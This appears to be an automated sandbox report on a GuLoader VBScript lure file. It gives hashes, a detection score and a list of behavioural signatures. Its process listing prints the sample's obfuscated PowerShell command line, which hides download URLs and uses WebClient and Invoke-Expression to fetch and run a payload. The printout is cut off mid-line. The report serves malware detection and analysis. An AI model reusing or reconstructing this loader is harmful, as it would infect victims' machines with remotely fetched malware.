Edit tour
Windows
Analysis Report
Urgent_File_Confirmation_00000000000000000000.vbs
Overview
General Information
| Sample name: | Urgent_File_Confirmation_00000000000000000000.vbs |
| Analysis ID: | 1466652 |
| MD5: | 182b6f3f627a31ed7ca07dac5301a313 |
| SHA1: | 10344a8ea462146b923a66accacb6882d5788322 |
| SHA256: | a268983f063d0e933961c93cd3d813a7b8ba94d81789eced7da6a2e3bef32836 |
| Tags: | vbs |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7328 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Urgen t_File_Con firmation_ 0000000000 0000000000 .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7456 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'unloveli ness Vvest ol Shrimpi sh byrende rnes Risto rnos33 Est oppel Toga ernes Kalk ulationsko lonnernes Dispatch s ystematikk erne Hemme lighed Ton ical Uncru dded ulyks alighed ug thedens Bu ddingpulve rets Verte brate Purs uits Parti tional Rig senhedens brugervenl ig Hypnoti seres Quin queradiate Saiga unl oveliness Vvestol Sh rimpish by rendernes Ristornos3 3 Estoppel Togaernes Kalkulati onskolonne rnes Dispa tch system atikkerne Hemmelighe d Tonical Uncrudded ulyksaligh ed ugthede ns Budding pulverets Vertebrate Pursuits Partitiona l Rigsenhe dens bruge rvenlig Hy pnotiseres Quinquera diate Saig a';If (${h ost}.Curre ntCulture) {$Optiona lly++;}Fun ction Nord vest61($Sp altedefini tionernes) {$Defraudi ng=$Spalte definition ernes.Leng th-$Option ally;$Gens kabtes='SU BsTRI';$Ge nskabtes+= 'ng';For( $Snakeflow er=1;$Snak eflower -l t $Defraud ing;$Snake flower+=2) {$unloveli ness+=$Spa ltedefinit ionernes.$ Genskabtes .Invoke( $ Snakeflowe r, $Option ally);}$un loveliness ;}function Diagonalg ade209($Pl ejninger){ . ($ Tantarabob us) ($Plej ninger);}$ Amtskommun aldirektre ns=Nordves t61 ' MPo. zSiIlSlna, /S5 . 0U U (.WSiSn dS opwSs .NFT l 1D0O..0 ; sWOi nE6 P4e;B CxO6 E4N;S .rSv H:R1 2 1 . 0O)T .G e Gc k oT/G2 ,0V1,0P0S1 M0L1M fFTi r.e.fKoBx G/,1M2.1s. C0T ';$Rid estiernes= Nordvest61 'SUPs e,r - ASg,e,n ,t. ';$Ris tornos33=N ordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJnt g,eSr n eA .Gs.e a >F hStItApTse : /B/Sm i, lSa n a,cJ e sB.Vc o m /uM aFg n,e,tui sF ePr i n gN e rVnBeO.G sOeHa ';$D iftongerin gerne=Nord vest61 '.> S ';$Tanta rabobus=No rdvest61 ' .iEe x ';$ Mugningers 157='Kalku lationskol onnernes'; $Alluviate = Nordves t61 '.eNcP h.oK P%HaH p,p dPa tI aU%.\ PSaF rMaNp hPyL s i.f,eSrd o u.s ..MD aKk. h& &B eGc hMo B t ';Diagon algade209 (Nordvest6 1 'U$Sg.le o bRaUlM:, rRe k rPu t,sT=K(GcB m d F/ cI $ A,l.lSu vCi,aut e, ) ');Diago nalgade209 (Nordvest 61 'G$Cg,l ,oBbAa l : PbOyAr,eUn .d eLr.n e As,= $SR,i Ys,t oMrLn To s,3.3K. DsSp l,i t .( $TD isf Ft o.nHgCe rUiun g,e Or.nReA)A ');Diagona lgade209 ( Nordvest61 'R[ANBe,t A.PSTe rav ,i cBeBP o i nAtMMaa ,n aCgte,r ,]I: :CS e Mc,uSr i,t .y,PRrUo,t o cDoDl E =E M[PNOeG t..SSReDc. uMr i t yF PErMout,oB c,o lUTFy pOe ] :.:, T lEsU1U2 ');$Ristor nos33=$byr endernes[0 ];$Konjunk turgevinst erne= (Nor dvest61 'D $BgTl oPbE a.l :DUMnP sAubmTpSt. u,oHu.s.l y,=UN eOwK -fO.bFjSeS c tJ FS yC s tme,mF.P NNe.t .HWi eLb C l iS eUn t');$K onjunkturg evinsterne +=$rekruts [1];Diagon algade209 ($Konjunkt urgevinste rne);Diago nalgade209 (Nordvest